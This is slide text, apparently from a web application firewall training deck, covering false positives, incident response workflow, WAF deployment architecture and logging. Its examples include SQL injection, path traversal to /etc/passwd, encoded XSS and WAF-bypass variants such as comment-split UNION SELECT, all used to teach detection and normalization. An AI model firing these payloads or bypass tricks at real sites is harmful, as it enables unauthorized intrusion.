Config detection
Apply prevention action
Traffic
Trusted traffic concept
No attack traffic.
If hit -> false positive

70295
©
Attacks
•Brute force
•DDoS
•Web Exploit
•Bot/Botnet
Mitigations
•Anti ATO
•Anti Floods
•Anti RCE
•Anti Automation
PE
•Anomaly, CI
•Anomaly, CI, UA
•Signature, meta
char enforcement
•Session anomaly,
structure, position
Mitigations = Detection + Prevention

70295
©
E D P
E D P
Valuable user – blocked on false positive rule
Real Attack
Valuable user
Why ?
False Positives – the enemy of security value
False positive – identifying good traffic as bad traffic
i.e. the rule get hit but it is not an attack

70295
©
P
E D P APP
Create rule
Verify rule
Enforce
E D P
E D
Alarm – no Hit
Alarm - Hit
Blocking – Hit
Outcome:
a) Hits are false positives – Refine or keep in alert
b) Hits are attack – Blocked
c) Hits are FP and RA – Sperate the rules or add other migrations
d) No hits – Block when Timeline
e) Hits (Few) - keep in Alert (default)
Rules maturity / life cycle
Timeline

70295
©
Entity
Bad parsing
Un supported protocol
Bad payload
Detections
Signatures – know word
Anomaly – wrong thresholds
Restrictions – legitimate mc
Client int – wrong ID
Prevention
Block – good users
Honey pot – wrong data
False positive examples

70295
©
WAF Policy – Features
Brute force Rules
E D P
E D P
E D P
E D P
E D P
E D P
E D P
ADDoS Rules
Vulnerability Hunting Rules
E D P
E D P
E D P
Bot/Botnet Rules
APP
WAF
POLICY
❑ Signature
❑ User agent
❑ Headers
❑ User input
❑ Normalization engine
❑ Brute force protection
❑ Distrusted brute force
❑ Prevention
❑ Ban for X hours
❑ CAPTCHA
❑ Bot protection
❑ Web scraping protection
❑ Log all transaction
❑ Slow post detection

70295
©
Reporting
SECURITY REPORTING
1. DATA PLANE - WAF ENGINES
GRAPHS
STATISTICS
LOGS
DASHBOARD

70295
©
App health
Incidents
WAF Security level
Traffic
E:H D:S BLOCK
E:URL D:A ALARM
1IP 100 Req
Critical
E:IP D:R RATE LIMIT
Medium
High 1IP 10Req
10IP 1000Req
Brute force App DDoS Web Exploit
60% 70% 50%
56.00%
58.00%
60.00%
62.00%
64.00%
66.00%
68.00%
70.00%
72.00%
App 1 App2 App3 App4
SIRT WA-CAV
WAF Health
Load avr% Numbers
CPU 65% 16 core
Memory 55% 64GB
Throughput 35% 6.66G
RPS 25% 111,000
99 LIVE I’M OK

70295
©
Aggregated 21.21k 23.57 36.72k
10.10.1.12 2.75k 3.05 4.08k
172.29.46.44 2.26k 2.51 5.27k
192.168.1.1 2.25k 2.50 3.10k
172.16.184.126 2.23k 2.48 4.64k
192.168.1.12 2.01k 2.23 2.82k
0
500
1000
1500
2000
2500
3000
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
RPS @ URL /
Top URL’s RPS
/ 21.21k
/search.php 2.75k
/login.php 2.26k
/sell.php 2.25k
/blog.php 2.01k
Statistics
0
1000
2000
3000
4000
5000
RPS @ Login.php
10.10.10.0 10.10.20.0 10.10.30.0
10.10.40.0 10.10.50. total
Graphs

70295
©
Security Incident log
R1
GET /314355195369564852’2.php HTTP/1.1
User-Agent: (/Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101/,;/>
Pragma: no-cache
Cache-Control: no-cache
Content-Length: -40
Host: sirt.club
R2
TRACK / HTTP/1.1
Host: sirt.club
User-Agent:: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKip/537.36
(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Trace-Test: Nikto
Incident
Incident
Incident
Incident
Incident
R1
R2
R3
R4
Rx
R1
GET /3143551953695648522.php
HTTP/1.1
Host: sirt.club
Entity: 3143551953695648522.php
Detections: meta char in URL ‘
Prevention: blocking page
Time: 11:12:13
Source IP: 10.0.0.138
R3
OPTIONS /API%20/V1/login HTTP/1.1
User-Agent: Mozilla/5.0 Firefox/11.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Host: sirt.club
Aka: request/Response logs

70295
©
Security Incident, the moment we all being waiting for
– the money time !
IR Win

70295
©
Security Incident Response
▪ Apply to security product/service
▪ Deal with modern threat landscape
▪ Small clear actions
▪ Rapid process
▪ Agile IR
❑ Fast mitigation
❑ Easy to use
❑ Scalable
❑ Repeatable
❑ Measurable
The Money Time

70295
©
2.MITIGATION
1.AM I
3.RESPONSE BTR
INVOCATION

70295
©
INVOCATION
Invocation – a possible security related issue/s needs attention, Now
► Security Device
► App monitoring
► Humans
P1.AMI
INVOCATION

70295
©
► Security Device - WAF Protection elements ( policy )
INVOCATION TYPES
► 3rd party security / monitoring software or services
► Humans – customers complaints, other department personnel nonfiction
Hello support: your app is NOT working !?!?
SUPPORT
LOAD
App dude: hey, its
eating resources $$$

70295
©
INVOCATION – ACT!
▪ Dashboard alert
▪ Email
▪ SMS
▪ Instant messaging
▪ Phone call
WAF notification center
ATTACK!
Message:
• What happen :
• How bad it looks
• How long :

70295
©
1. AM I
• S1 – Service down
• S2 – Major impact
• S3 – General impact
Declare the incident type and Determine the impact
Am I under attack ?
RA – Real attack
FP – False positive
FA – False alarm BTR
Impact
incident type

70295
©
1. AM I
• Severity: S1
• Status: Active Attack
• Damage: Major
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now (4H – 12H)
• Severity: S2
• Status: Active / Immanent
• Damage: Moderate / Potential
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now / Soon (12H – 24H)
• Severity: S3
• Status: Security Related
• Damage: Minor
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Soon/ Later (24H – 3D)

70295
©
1. AM I
• S1 – Service down
• FP: Mass
• Damage: Visible Blocking
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now (4H – 12H)
• Severity: S2
• FP: Many
• Damage: Affecting Traffic
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now / Soon (12H – 24H)
• Severity: S3
• FP: Specific
• Damage: Passive FP
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Soon/ Later (24H – 3D)

70295
©
2. MITIGATION
I. Searching Suspicious indicators (3SIN)
II. Compose Prevention rule (PR)
How to mitigate (Seek & Destroy )
Find Suspicious Indicators (SIN) & Compose Prevention Rule (PR)
• Detection + Prevention = Mitigation

70295
©
I. Suspicious indicators
2. MITIGATION
Attack Elements
▪ Vulnerability
▪ Attack Surface
▪ Attack Agent
▪ Exploit
▪ Attack Vector
▪ AMO
Protection Elements
▪ Signatures - Pattern matching
▪ Anomaly - Aggregation and thresholds
▪ Restrictions - Allow / Block lists
▪ Client Interrogation - HTTP client inspection
GRAPHS
STATISTICS
LOGS
DASHBOARD
REPORTING

70295
©
2. MITIGATION
WA-CAV policy
•SQLi
•XSS
•LFI/ RFI
•CSRF
•RCE
Web Exploits
•BF
•CS
•PS
ATO
•Floods
•Loads
DDoS
SIGNATURES
RESTRICTIONS
ANOMALY
CLIENT INTG
ANOMALY
ANOMALY
CLIENT INTG
RESTRICTIONS

70295
©
2. MITIGATION
SIRT FIP
Forensic Investigation Procedure
Classify
Sources
Examine
Patterns
Internet
POST / login.php HTTP/1.1
Host: sirt.club
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
username=' or 1=1--&password=123456action=login

70295
©
2. MITIGATION
I. Suspicious indicators (3SIN)
II. Prevention rule (PR)
How to mitigate (Seek & Destroy )
Find Suspicious Indicators (SIN) & Compose Prevention Rule (PR)
• Protection Rules – general policy - policy
• Prevention Rule – specific attack - SIR

70295
©
E D P
Prevention Rule
WA-CAV
BRUTE FORCE
ADDoS
VULNERABILITY
HUNTING
AUTOMATED
ATTACKS
2. MITIGATION II. Prevention Rule (PR) • Wide vs narrow rules
• Specific rule vs general rule
Goal:
• Prevention rule / Features
• Few prevention rules / Features

70295
©
3. RESPONSE
I. Apply mitigation strategy
II. Monitor mitigation
Apply prevention rule and verify attack mitigation
Response – Apply & Verify

70295
©
Policy
Policy
Policy
Policy
Policy
Policy
CLIENTS
MGMT
Apply Prevention Rule
{CONTROL PLAIN}
E D P

70295
©
0
500
1000
1500
2000
2500
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
URL /
✓ BTR – monitoring attack
Response – Apply & Verify
0
500
1000
1500
2000
2500
3000
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
URL /
3. RESPONSE
• Return – bypass
• Return – different approach – same attack
• Revenge – other attack
✓ BTR – EoA – end of attack

70295
©
BTR
Back To Routine (BTR)
Declaring Back to Routine when
attack is being blocked or attack stopped
Win
IR Win
✓ Damage evaluation report
✓ Severity is 0

70295
©
Recon
Attack
Start
Invocation
AmI
Mitigation
Response
Monitoring
BTR
C. Human work time
B. Recovery time
A. Response time
Incident response - time line
What we want to know:
A. Response time
B. Recovery time
C. Working time

70295
©
Attending:
▪ SIRT iMgr _________
▪ SE Focal____________
▪ App Dev___________
▪ Dev Ops___________
▪ Mgmt __________
Opportunities :
▪ Short term
▪ Long term
Incident name:
CAV type:
Severity
App name
App type
Attack type
Win/Lose
Cost:
o Direct ______________
o Indirect ____________
o 3rd party ____________
Total IR cost: _____________
Incident details
High lights
Low lights
Response time
Recovery time
Working time
________________
_________________
_________________
AE List:
PE List
Feature name:
RCA
Damage control ▪ Auditor_____________
▪ CxO notification: Y/N datetime

70295
©
1. AM I
2. MITIGATIONS
FINE TUNE
BTR
RA / FP
FP
RA
SEEK
DESTROY 3. RESPONSE
APPLY
VERIFY
SEEK
FIX

70295
©
BTR
GRAPHS
STATISTICS
LOGS
DASHBOARD
3. RESPONSE
2. MITIGATION
1. AM I
INVOCATION
Information sources

70295
©
Auto SIR
APP
WAF
POLICY
WA-CAV
BRUTE FORCE
ADDoS
VULNERABILITY
HUNTING
AUTOMATED
ATTACKS
Brute force Rules
E D P
E D P
E D P
E D P
ADDoS Rules
Vulnerability Hunting Rules
E D P
E D P
E D P
Optimized policy (OPR) is detecting
and preventing attacks – AUTOMATICLY
Maximum Security Value

70295
©
SIR levels
1. AM I
2. MITIGATION
BTR
3. RESPONSE
INVOCATION
Org
Division
Team
Auto

70295
©
Planning the right security architecture is your key for success

70295
©
Home User
PC
Browser
www.site.com
Database
Servers
Application
Servers
Web
Servers
WAF
Home User
PC
Browser
www.site.com
Database
Servers
Application
Servers
Web
Servers
WAF
Tap mode
Inline
WAF mode
Res
Req

70295
©
Home User
PC
Browser
www
Database
Servers
Application
Servers
Web
Servers
App:
• CPU
• Memory
• Network
Response size
WAF:
• CPU
• Memory
• Network
RPS RPS
TPS (WAF)
TPS (App)
Latency
HTTP request
TLS – handshake
TCP IP connection
Round trip , TPS (Client)
HTTP Transaction - inline device
Ingress
Egress
Latency (T)
Processing time Latency
• RPS
• TPS
• Latency
• Throughput

70295
©
Firewall
WAF
Application
Server/s
Web
Server/s
Database
Server/s
ADC
Web App
ABSTRACTION LAYER/S
Application/s
Request
NF
NG
Clients
WAF NG
Internet
Hybrid
Cloud – Public / Private
On perm
ADC/LB
Edge
Perimeter
App Mesh
WAF environment
Environment : On perm , Cloud – Public / Private, Multi Cloud, Hybrid

MESH
Mesh WAF
Edge WAF
Perimeter WAF
NF
NF App srv
App srv
{API}
NF
web
web
WAF Location
web
web
HTTP Clients
WAF locations – edge / perimeter/ mesh

70295
©
web web
Edge WAF
WAF Location: Edge
Sanitized traffic
FQDN

70295
©
Internet
Edge
Internet
POP2
App1
Zone2
Edge
POP1
App1
Zone 1
POP1 POP2
Edge WAF
WAF Location: Edge

70295
©
NF
Web application
Web Bot
Requests
Responses
Application/s
Request
handler/s
AAA
Mobile app/ API
DataBase/s
Perimeter
Web Site
Analytics ∑
SIEM ≈
Internet
WAF Location: Perimeter
Perimeter WAF
{API}

70295
©
NF
Web application
Web Bot
Requests
Responses
ABSTRACTION LAYER
Application/s
Request
handler/s
AAA
Mobile app/ API
Data storage
Perimeter
Web Site
Orchestration
Analytics ∑
SIEM ≈
Internet
DevOps
Perimeter 360 WAF
WAF Location: Perimeter 360
{API}

70295
©
Login
Searching
Cart
Mgmt
Browsers
Handler
DB
DB
Payment
CD
</code..>
Machine to machine
CI/CD
CI/CD
CD Continues deployment
Continues integration
Continues delivery
WAF Location: Mesh
Mesh WAF
Micro Services / API
App CP

70295
©
MESH
NF
NF App srv
App srv
WAF Strategies
Web app
Web app
Web app
CI
A SIG/R
CI
CI
A SIG/R SIG/R
WAFx3: Edge + Perimeter + Mesh
WAFx2: Edge + Perimeter
A SIG/R
WAFx1: Edge / Perimeter

70295
©
web
Requests
Responses
1.
3rd party
HTTP
FQDN
NF
API
Cloud B
1. Edge screening WAF
2. Perimeter WAF
3. Mesh WAF
4. CP/Admin panel WAF
5. 3rd Party WAF
6. CD or CD/CD WAF
7. Scaling WAF – multi clouds
8. Scaling WAF – hybrid apps
WAF Strategies
2. 3.
5.
6.
7.
8.
4.

70295
©
Policy building
Hardware
Operating system
WAF
Network
SIR
Configuration / Setups / Updates
CLOUD
DP - PE
CP
Managing the software and security
Vendor manage
You manage
You / Vendor manage
Reporting

70295
©
Managed Security Security Management Full Security Management
Security Management – types
WAF aaS
❑ Security report
❑ SIR
❑ Policy
❑ Configuration
❑ Setups
❑ Create / updates
❑ Infrastructure - upgrades
❑ Deployment
❑ OS – Scaling
❑ Security report
❑ SIR
❑ Policy
❑ Configuration
❑ Setups - updates
❑ Create / update
❑ Security report
❑ SIR
❑ Policy
❑ Configuration
❑ Setups
❑ Create / updates
❑ Infrastructure - upgrades
❑ Deployment
❑ OS – Scaling
Vendor aaS
You
You
You
❑ Infrastructure
❑ Deployment - upgrades
❑ OS – Scaling
You

70295
©
web cloud
NF
NF App srv
web cloud
cloud
NF
SECURITY MGMT
Unified
Reporting
WAF mgmt.
Mono MESH
MESH

70295
©
WAF architecture capabilities (DSMM)
App ❑ Classic ❑ Modern ❑ Mix
Environment
Cloud ❑ Cloud: Public ❑ Cloud Private ❑ Multi cloud ❑ Hybrid (Cloud <-> OP)
On perm ❑ On Prem: Shared Hosting ❑ On Prem: detected hosting ❑ Multi On Prem ❑ Hybrid (OP<->Cloud)
Management
Management ❑ For you ❑ Semi ❑ You
WAF locations ❑ Edge ❑ Perimeter
❑ Perimeter (360)
❑ Mesh
❑ MonoMesh
Software
SW type ❑ HW OS SW ❑ OS SW ❑ SW
Virtualizations ❑ vOS ❑ vSW - Container ❑ vSW – K
Security Mgmt – Sec OPS
Policy level ❑ ID/PS ❑ Bot MGR ❑ WAF ❑ WAF NG
Security Reporting ❑ Security center (learning)
❑ WAG reporting
❑ graphs
❑ Risk reporting
❑ Statistics
❑ Mitigation reporting
❑ Event log
❑ Forensics
OPS
Deployment ❑ ISO file ❑ RPM ❑ VM image
Config ❑ API ❑ Config file ❑ GUI

70295
©
“Keep it up to date and Never drop the ball, YOU are the last in line and own it
Policy
Update
Upgrade
MGMT
HA
Utility

70295
©
DP WAF
CP AGENT
WAF structure
CLIENTS
2. CONTROL PLAIN – MGMT
CI/CD

70295
©
WAF software types
Hardware
Operating
System
Network
Hardware
Operating
System
Network
Hardware
Operating
System
Network
Hardware
Operating System
WAF Software
Operating System
WAF Software WAF Software

70295
©
Hardware
Operating
System
Virtual - OS
Network
vOS vOS vOS
Hardware
Operating
System
Virtual - container
Network
C1 C2 C3
Hardware
Operating
System
Virtual - Pod
Network
P1 P2 P3
Hardware
Operating
System
Network
Platform
• WAF Software
• Operating System
• Hardware
• WAF Software
• Operating System
• WAF Software
❑ ISO
❑ SW
Deployment

70295
©
Deployment Topologies
Hardware
Operating
System
Virtual - OS
Network
vOS vOS vOS
Hardware
Operating
System
Virtual - container
Network
C1 C2 C3
Hardware
Operating
System
Virtual - Pod
Network
P1 P2 P3
Hardware
Operating
System
Network
DATA PLANE
REPORTING
CONTROL PLANE
DATA PLANE
CI A SIG/R
Platform

70295
©
High availability
AKA: Fault tolerant -
When master WAF fails
Active / Active
OS
WAF
Hardware
OS
WAF
Hardware
OS
WAF
Hardware
OS
WAF
Hardware
N+1 concept
Active / Stand By

70295
©
WAF 1
WAF 2
WAF 3
WAF 3
WAF 2
Traffic (RPS)
Time
Load balancing Cluster Scaling
Load management
N+1
Primary (A)
Secondary (Burst)
Fault tolerance: (Stand By)
Active
Active
Active
New
Old
Stand By
Stand By

WAFcapacity planning - LB
Session persistence
New session
WAF # 1
WAF # 2
App # 1
App # 2
Stand By – online

70295
©
Hardware
Operating
System
Virtual - OS
Network
vOS vOS vOS
Hardware
Operating
System
Virtual - container
Network
C1 C2 C3
Hardware
Operating
System
Virtual - Pod
Network
P1 P2 P3
Hardware
Operating
System
Network
WAF cluster
SB
SB
WAF cluster
WAFcapacity planning – cluster
Stand By – online

70295
©
Hardware
Operating
System
Virtual - container
C1 C2 C3
Hardware
Operating
System
Virtual - Pod
Network
P1 P2 P3
Network
WAFcapacity planning – scaling
The sync challenge
Stand By – offline
Stand By – offline

70295
©
Standby unit
CLIENTS
A
B
Active unit
a) Update /Upgrade on B (SB)
b) Testing – smoke test or rollback
c) Switching to active unit (A->B)
d) Make A stand by
e) Update /Upgrade on SB (A)
f) Verify ok
Active unit
Standby unit
Upgrade / Updates procedure
a) Create new from ISO – B
b) Import config (from A)
c) Testing – smoke test or new install
d) Traffic route new traffic - B
e) Kill old WAF - A
A
B

70295
©
Centralized Management (CM)
POLICY ALL/APP1
POLICY ALL/APP2
POLICY 20
POLICY 30
POLICY 40
SERVICE: IP:80
SERVICE: IP:8080
SERVICE: IP:8008
POLICY LOGIN/APP2 APP2
APP1
App # 20
App # 30
App # 40
Centralized
Management

70295
©
CLIENTS
CLIENTS
CLIENTS
P.MGMT
D.MGMT
Policy
Policy
Policy
Policy
Policy
Policy
Policy
i. Policy management - CRUD – CP
ii. WAF management – updates/ upgrades
iii. Reporting – visualization
Management Types
R.MGMT
i
ii
iii

70295
©
web cloud
NF
NF App srv
web cloud
cloud
NF
R.MGMT
MESH
MESH
web
Management Levels:
→ Site
→ WAF
→ Policy

70295
©
1. DATA PLAIN
GUI API CONFIG File
Configuration
E D P
E D P

70295
©
Create
Signatures:
❑ Information
❑ Generic
❑ CVE
Parameter name:
Parameter value:
Policy Name: main_App | notification (21)| incident log | support panel
Create New Parameter
Online help | Contact vendor support
*
q
search.php
CLIENTS
Configuration – GUI

70295
©
NF
WAF NG
{ API }
Mobile client App
Mobile Browser
LT/ PC Browser
{ API }
LT/ PC CLI
{ API }
{ API }
{ API }
Configuration – API
Policy {Main_app}
Parameter {q}
Signatures {specific CVE family}
Prevention action {alert , blocking page}
WAF API Collection :
{ API }
3rd party

70295
©
NF
WAF NG
{ API }
WAF config file:
Policy: Main_app
<config>
Define Parameter : q
Configure signatures – specific CVE
Apply – prevention action: alert , blocking page
</config>
Configuration – Config file
#load new config

70295
©
Log format:
✓ Request: URL, Headers, QS,PD, Meta character
✓ Response: headers , post data , meta data
✓ WAF: ALL reporting (raw)
✓ WAF meta data: signature, hit on, CRLF, encoding
Log repository
Indexing
Reporting
Ingress
✓ Sys log
✓ SIEM
✓ Repo
Set ups
Egress

70295
©
Reporting
WAF LOGS
AUDIT
MAINTENANCE
SYSTEM
o Audit – who did what – changes to policy
o Maintenance – update / upgrade fails
o System – memory, configuration
SECURITY REPORTING
SUPPORT REPORTING
1. DATA PLANE - WAF ENGINES
GRAPHS
STATISTICS
LOGS
DASHBOARD

70295
©
WAF LOGS
AUDIT
MAINTENANCE
SYSTEM
SUPPORT REPORTING
o Audit – who did what – changes to policy
o Maintenance – update / upgrade fails
o System – memory, configuration
#User admin access from IP X on Sunday 1:01 AM GTM
#User admin change policy to allow access from IP Y
#User admin reboot me
Upgrade is needed to version X
Update failed
Updates for version X is success
Resources allocation memory increase in 5M total of 16GB
CPU spike to 90% for 10 minutes

70295
©
Utilities
Logging ❑ Local ❑ Remote ❑ All request ❑ Hits only
Log Repository ❑ Internal ❑ External ❑ Size: 6T
❑ Time: 6-month request
❑ Fault tolerance
3rd party ❑ ICAP ❑ Network FW integration
CM ❑ Local
❑ Dedicated
❑ CP utility
❑ Pull / push config
❑ Update/ upgrades
❑ WAF centralized report
❑ Policy
Traffic aggregation (unified
reporting )
Updates and upgrades
Updates ❑ Break Fix
❑ CVE updates
❑ New features
❑ Hotfix
❑ Engineer hot fix
❑ Full update file
❑ GUI
❑ API
❑ Config
❑ RPM
❑ SW
❑ ISO – OS + SW
❑ ISO – SW
Upgrade ❑ Migration tools ❑ WAF Config restore ❑ Rollback
Upgrades / upgrade schema ❑ Stand by / Active ❑ Active / Active ❑ New / old
Life time policy ❑ Sustain release ❑ Feature release ❑ Product life time ❑ Support life time
HA
HA ❑ Load balancing ❑ Cluster ❑ Scaling
Support tools
Support reporting ❑ Audit log ❑ Maintenance ❑ System ❑ Debug
Policy export – restore ❑ Text
❑ HTML
❑ Binary ❑ JSON
❑ XML
❑ Manual GUI
❑ API

70295
©
WAF Management
POLICY ALL/APP1
POLICY ALL/APP2
POLICY 20
POLICY 30
POLICY 40
SERVICE: IP:80
SERVICE: IP:8080
SERVICE: IP:8008
POLICY LOGIN/APP2
• Site level
• Zone level
• App level
CI A SIG/R
• Edge -> screening
• Perimeter -> classic
• Mesh -> microservice

70295
©
Web Application
ABSTRACTION LAYER/S
Application/s
Request
handler/s
AAA
Database/s
SIEM ≈
{ API }
Admin
Mobile client App
Mobile Browser
{ JSON }
{ API }
Mobile app/ {API}
Browser
{ API }
CLI
Analytics ∑
Policy strategies – Separation of Entry Point
[QS/PD]

70295
©
{API}
Web Application
ABSTRACTION LAYER/S
Application/s
Request
handler/s
AAA
Data storge
SIEM ≈
{ API }
{ API }
{ API }
Web App
Admin
Mobile client App
Mobile Browser
{ JSON }
{ JSON }
[QS/PD]
{ API }
{ API }
Mobile app/ {API}
Browser
{ API }
CLI
Data Plane API
Control Plane API
Integration API
Deploy API
Analytics ∑
API entry point protection points
[QS/PD]

70295
©
Application/s
Request
handler/s Data storge
Firewall ADC
WAF
Application/s
Request
handler/s Data storge
WAF NG
3RD PARTY SW
• Server/s
• Services
• Libraries
• Functions
FREE FOR ALL
ADC
Firewall
Boarder
Router
Boarder
Router
Exists but not exploitable
Supply chain attacks

70295
©
NF
E
HTTP IP
CONTROL PLANE
DATA PLANE
Remote admin
Corporate network
Corporate admin
App usage
App usage
Attacker:
• APP Vul
• CP vul
Corporate user
Control plane protection

70295
©
WA-CAV policy
Anti
Auto
Anti
floods
Anti bf
Anti
web
exploit
Multi layer security solution
AUTOMATED
ATTACKS
WEB EXPLOITS
BRUTE FORCE
ADDoS
CI: First request
CI: First response
A: Session opening rate
A: RPS increase on Session
S: User agent
A: RPS from IP
A: RPS to URL
A: RPS from Geo
A: RPS from session
A: RPS from IP to login URL
A: RPS from any IP to login URL
A: RPS from Geo to login URL
A: RPS from session to login URL
S: Specific CVE exploits
S: Generic exploits
R: Meta char on parameter values
R: Anti evasions

70295
©
Parser - Entities
Protocols ❑ HTTP 1.1 ❑ API ❑ Mobile API
Payloads ❑ Text ❑ JSON ❑ XML
User input ❑ Login ❑ Search text ❑ Posting
Traps - Detections
Signature ❑ Informational (W,B,D) ❑ Generic exploits (W,B,D) ❑ Specific exploit (W)
Anomaly ❑ Request per second (W,B,D) ❑ Failed log in (B) ❑ Session opening (W,B,D)
Restriction ❑ Characters sets (W,B) ❑ RFC & evasion (W,B,D) ❑ Flow
Client interrogation ❑ CAPTHCA (W,B,D) ❑ Client capabilities (W,B,D) ❑ Source ID (SID) (W,B,D)
Enforcer - Prevention Action
ALERT ❑ GUI: dashboard / iLog [M] ❑ Email / SMS ❑ Instant messaging
BLOCK ❑ Blocking page [M] ❑ TCP FIN / RESET /Drop [M] ❑ Stripping / Cloaking
LIMIT ❑ Rate limiting (RPS) [M] ❑ Time limiting [M] ❑ Session limiting
FOLLOW UP ❑ Redirect to main / honeypot ❑ Soft Blocking ❑ Retaliation
Protection elements -> PR

70295
©
CI
A SIG/R
Scrubbing center
Threat actors
Risky users/ traffic
MVU – Most valuable users
PVU - Potential valuable users
Authorized automation
Users group – WAF as a traffic manager
Partners
3rd Party

70295
©
Forensic Investigation Procedure
S
M
V
Classify Sources
• Source IP – RPS
• Source IP – sessions
• Source IP geo
Classify client
• Simple client / simple bot
• Browser / full browser bot
• Human / full human bot
Classify Pattern
• Well formed
• Structure
• Position
Verdict
• V: Clearly good user request
• M: Clearly harmful request
• S: Potentially harmful
Prevention Action:
✓ Allow
✓ Exempt – all/ partial
X Block – specific request / IP
X Shun – all traffic from IP/session
? Monitoring – need more data
Forensic Investigation Procedure (SIRT FIP)
/
A B
Classify Actions
• CRUD
• Flow
• Timeline

70295
©
Simple bot
Full Browser Bots
Full Human Bots
CI – L1
Browser base test
CI – L2
Browser Attributes
CI – L3
Mouse movements
HTTP Client Classification
Simple client
Browser client
Human client
Pass / Fail

70295
©
Device IP Sessions RPS Flow / Top URL’s
Laptop
New 10 100
Register
Login
Cart
Pay
PC
Returning 15 1000
Browse_IS
Login
Pay
IOT
New 1000 25000
/ping
/swcheck
Mobile phone –
browser
Returning 150 3500
/sell
/browser?ID=
Mobile phone –
App
New 2 30
appmobile/V1/
Classify sources: Clients / sources / users – RPS – Historical

70295
©
Security Request log
R1
GET /314355195369564852’2.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101
Firefox/39.0
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Host: sirt.club
R2
TRACK / HTTP/1.1
Host: sirt.club
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Trace-Test: Nikto
Incident
Incident
Incident
Incident
Incident
R1
R2
R3
R4
Rx
R1
GET /3143551953695648522.php
HTTP/1.1
Host: sirt.club
Entity: 3143551953695648522.php
Detections: meta char in URL ‘
Prevention: blocking page
Time: 11:12:13
Source IP: 10.0.0.138
R3
OPTIONS /API/V1/login HTTP/1.1
User-Agent: Mozilla/5.0 Firefox/11.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Host: sirt.club
Classify Pattern
• ETF
• ATF
• User input
• Well known
• Context

70295
©
User action and flow
/
Info
dynamic
products
ProductID
Cat
Login
username
password
Account
Username
email
Payment
pay
CCN
checkout
amount
password
a) Main page browser
b) Link: Login page
c) Bookmark: account
d) Login
a) Browse /add items
b) Login
c) Auto Login
d) login
a) Check out
b) Update CCN
c) Browser items
d) Login
a) Payment
b) Browse Items
c) Payment
d) Login
1 min
2min
30sec
1 sec
2 sec
1.5 sec
Classify Actions

70295
©
% Case insensitive
% Comments
% Encoding
% Tricks and Koontz
Goal: bypass the WAF protections
WAF Bypass and Normalization
GET /search.php?q=../../../../../../etc/passwd HTTP/1.1
GET /search.php?q=&#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c HTTP/1.1
GET /search.php?q=
SRC=javascr&#10
5;pt:alert
('XSS')>
GET /search.php?q=" ' exploit & < >

70295
©
Path Obfuscation/Evasion
GET /search.php?q=/etc////passwd HTTP/1.1
Host: #@$!$#@$
/etc////passwd /etc/passwd
Web server accept and change it to:
“What should the WAF do ?
/etc/passwd
/etc////passwd Match signature : Allow / Block

70295
©
Normalization – Anti Bypass
GET /search.php?q=ExPloiT HTTP/1.1
Host: sirt.club
Norm WAF Signature
Change to lower case exploit
Remove comment in the parameter
value -> match sig
‘and 1=0 union select all from table;
Any True condition in the parameter
value -> match sig
Any OR X = X/Y - block
GET /search.php?q=' and 1=0 un/**/ion/**/sel/**/ect all f/*haha*/rom table HTTP/1.1
Host: sirt.club
OR ‘bypass' = ‘bypass’
OR ‘Bypass’ = A’Bypass'
OR 'Koontz' = ' Koo'+'ntz'
OR 'Koontz' LIKE ‘Koo%'
OR 'Koontz' > ‘K'
OR 'Koontz' < ‘Z'

70295
©
0
5
10
15
FISCAL YEAR TRAFFIC REPORT
CVE 10.0
Heads up
Imminent by design
Activism
Sales promotions
$
D Day’s
Threats actor opportunity
Shopping

70295
©
0
1
2
3
4
5
6
7
off hours monring monring noon noon after noon after noon off hours off hours
Main App
Users Partners Attack
AMO 1. Riding the wave
2. Decoy
3. Multi vector
1.App Stress
2.Vul hunting
3.Brute force

70295
©
0
1
2
3
4
5
6
7
off hours monring monring noon noon after noon after noon off hours off hours
Main App
Users Partners Attack
Traffic Riding attacks Who is doing ETF and who is doing ATF ?

70295
©
Attack Elements
▪ Vulnerability
▪ Attack Surface
▪ Attack Agent
▪ Exploit
▪ Attack Vector
▪ AMO
GRAPHS
STATISTICS
LOGS
DASHBOARD
REPORTING
• Entities
• Detections
• Prevention
• Rule
• Rule sets
Protection elements
Protection rule
Protection policy
PROTOCOL
PAYLOAD – HEADERS
USER INPUT
SIGNATURES
ANOMALY
RESTRICTIONS
ALERT
BLOCK
LIMIT
FOLLOW UP
Search the AE’s in the PE’s using the reporting to stop the attacks with Prevention rules
Relationships : AE, PE, Policy and Reporting

70295
©
PR
No Hits
OK FN
Hits
RA FP
1. Enforce
2. Monitoring -> Refine
3. Enforce
4. Alert -> Refine
Block -> alert – refine
1 2 3 4
Rule maturity = Time + Traffic
Handling RA/FP/FN/FA
1. RA – Real Attack: true attack needs blocking
2. FP – False Positive: wrong detection (blocking but shouldn’t)
3. FN – False Negative: lack of detection (should be blocked but not)
4. FA – False alarm: mistake

70295
©
BTR
AMI Vulnerable AMI Under attack AMI Compromised
2. MITIGATIONS
SEEK
DESTROY
SEEK
PREVENT
Y/N
APPLY
VERIFY
SEEK
RECOVER
APPLY
VERIFY
APPLY
VERIFY
N=BTR
3. RESPONSE
SEVERITY
Y/N
SEVERITY
RA/FP/FN
SEVERITY

70295
©
WA-CAV Score - Site
Brute force App DDoS Vul Hunting
60% 80% 50%
By
requirement*
Traffic Break Down Valuable users - Allow Suspicious - Monitor Malicious – Block
App A 71% 6% 25%
